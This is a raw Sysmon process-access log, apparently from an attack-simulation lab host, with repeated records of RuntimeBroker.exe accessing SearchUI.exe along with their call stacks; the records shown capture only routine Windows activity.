12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
